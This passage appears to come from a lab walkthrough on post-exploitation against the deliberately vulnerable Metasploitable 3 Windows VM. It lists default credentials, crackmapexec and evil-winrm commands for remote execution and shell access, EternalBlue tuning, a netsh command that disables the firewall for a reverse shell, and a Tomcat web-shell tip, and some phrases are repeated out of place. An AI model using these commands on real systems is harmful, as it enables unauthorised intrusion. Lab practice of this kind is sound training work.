Now that you’re SYSTEM, what next?
If you have domain credentials (Metasploitable 3 has vagrant/vagrant and administrator/vagrant): metasploitable 3 windows walkthrough
crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"
Or use evil-winrm for an interactive shell: Now that you’re SYSTEM, what next
evil-winrm -i 192.168.56.103 -u administrator -p vagrant
| Problem | Solution |
|---------|----------|
| VM won’t build | Use Hyper-V (not VirtualBox). Run vagrant up --provider=hyperv |
| EternalBlue crashes target | Increase GroomAllocations to 12, set VerifyTarget to false |
| Firewall blocks reverse shell | Inside VM – netsh advfirewall set allprofiles state off |
| Tomcat 404 after deploy | Ensure context path matches WAR filename. Use /shell as context. | Or use evil-winrm for an interactive shell: evil-winrm